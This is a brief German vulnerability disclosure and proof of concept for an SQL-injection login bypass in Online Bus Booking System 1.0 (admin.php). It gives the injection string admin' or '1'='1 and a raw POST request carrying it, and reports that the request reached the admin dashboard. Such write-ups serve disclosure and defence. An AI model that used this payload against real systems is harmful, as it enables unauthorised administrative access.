
Online Bus Booking System 1.0, es gibt eine Umgehung der Authentifizierung auf dem Admin-Login-Bildschirm in admin.php per SQL-Injection über Benutzername oder Passwort.
Online Bus Booking System 1.0, es gibt eine Authentifizierungsumgehung auf dem Admin-Login-Bildschirm in admin.php mittels SQL-Injection beim Benutzernamen oder Passwort.
#Anbieter - SourceCodester
#Produkt -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#Schwachstellentyp - Authentifizierungsumgehung
#Betroffene Komponente - bus_booking/admin.php
#Angriffsart- Lokal
#Privilegieneskalation - true
#Auswirkung Codeausführung - true
Angriffsvektor
Gehen Sie zum Admin-Login-Panel und versuchen Sie, es zu umgehen
Im Request-Payload setzen
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
Erfolgreich im Admin-Dashboard angemeldet